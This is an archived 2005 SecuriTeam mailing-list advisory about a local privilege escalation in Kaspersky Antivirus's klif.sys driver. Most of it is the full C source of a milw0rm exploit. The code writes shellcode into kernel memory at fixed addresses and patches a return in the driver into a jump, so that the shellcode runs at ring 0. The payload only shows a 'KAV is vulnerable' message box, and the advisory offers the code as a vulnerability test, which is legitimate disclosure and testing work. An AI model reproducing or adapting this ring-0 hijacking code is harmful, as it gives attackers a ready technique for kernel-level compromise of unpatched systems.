[EXPL] KAV Local Privilege Escalation Vulnerability (klif.sys)

• Previous message: SecuriTeam: "[NEWS] Internet Explorer and Opera JavaScript Ghost Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 12 Jun 2005 13:20:52 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  KAV Local Privilege Escalation Vulnerability (klif.sys)
------------------------------------------------------------------------

SUMMARY

 <http://www.kaspersky.com/> Kaspersky Antivirus(KAV) is "a popular
Antivirus software bundle". A vulnerability in the Kaspersky product
allows local attackers to use the program's handling of messages to cause
it to execute programs at ring-0 privileges level. The following exploit
code can be used to determine whether your version of the product is
vulnerable or not.

DETAILS

Vulnerable Systems:
 * Kasperksy Antivirus version 5.0.227
 * Kasperksy Antivirus version 5.0.228
 * Kasperksy Antivirus version 5.0.335

Exploit:
/* Added NO_STRICT to 1 on line 2 /str0ke ! milw0rm.com */
#define NO_STRICT 1
#include <windows.h>

#undef STRICT

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;

unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200
     0x68,0x00,0x80,0x93,0xBE, //push <buffer address> - 0xBE938000
     0x6A,0x00, //push 0
     0xB8,0x00,0x00,0x00,0x00, //mov eax,<GetModuleFileNameA> -> +13
     0xFF,0xD0, //call eax
     0x68,0x00,0x80,0x93,0xBE, //push <buffer address>
     0x68,0x00,0x82,0x93,0xBE, //push <address of the notepad path>-
0xBE938200
     0xB8,0x00,0x00,0x00,0x00, //mov eax,<lstrcmpiA> -> +30
     0xFF,0xD0, //call eax
     0x85,0xC0, //test eax,eax
     0x74,0x03, //je +03
     0xC2,0x04,0x00, //retn 4
     0x6A,0x00, //push 0
     0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>-
0xBE938400
     0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>-
0xBE938400
     0x6A,0x00, //push 0
     0xB8,0x00,0x00,0x00,0x00, //mov eax,<MessageBoxA> -> +58
     0xFF,0xD0, //call eax
     0xC2,0x04,0x00 //retn 4
     };

unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt
[0xBE9372B0]

//////////////////////////////////////////////////////////////

BOOLEAN LoadExploitIntoKernelMemory(void){

//Get function's addresses

 HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
 HANDLE hUser=GetModuleHandle("USER32.DLL");

 FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
 FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

 FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

 *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
 *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
 *(DWORD*)(code+58)=(DWORD)pMessageBoxA;

//Prepare our data into ring0-zone.

 PCHAR pNotepadName=(PCHAR)0xBE938200;

 char temp_buffer[MAX_PATH];
 char *s;

 SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

 lstrcpy(pNotepadName,temp_buffer);

 PCHAR pMessage=(PCHAR)0xBE938400;

 lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");

 memmove(pCodeBase,code,sizeof(code));

 *pJmpAddress=(DWORD)pCodeBase;

 memmove(pKAVRet,jmp_code,sizeof(jmp_code));

 return TRUE;
}

///////////////////////////////////////////////////////////////

void UnloadExploitFromKernelMemory(){

 UCHAR retn_4[]={0xC2,0x04,0x00};

 memmove(pKAVRet,retn_4,sizeof(retn_4));

}

/////////////////////////////////////////////////////////////////

PUCHAR GetKAVRetAddress(void){

//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.

 UCHAR retn_4[]={0xC2,0x04,0x00};

 __try{

  for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){

   if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
    return pKAVRets[i];

  }

 }__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not
installed",NULL,0);return NULL;}

 MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335
versions of KAV",NULL,0);
 return NULL;
}

/////////////////////////////////////////////////////////////////

void main(void){

 pKAVRet=GetKAVRetAddress();

 if(NULL==pKAVRet)
  return;

 if(!LoadExploitIntoKernelMemory())
  return;

 char temp_buffer[MAX_PATH];
 char *s;

 SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

 PROCESS_INFORMATION pi;

 STARTUPINFO si={0};
 si.cb=sizeof(si);

 CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
      0,NULL,NULL,&si,&pi);

 UnloadExploitFromKernelMemory();
}

ADDITIONAL INFORMATION

The original article can be found at:
<http://www.milw0rm.com/id.php?id=1032>
http://www.milw0rm.com/id.php?id=1032

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Internet Explorer and Opera JavaScript Ghost Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]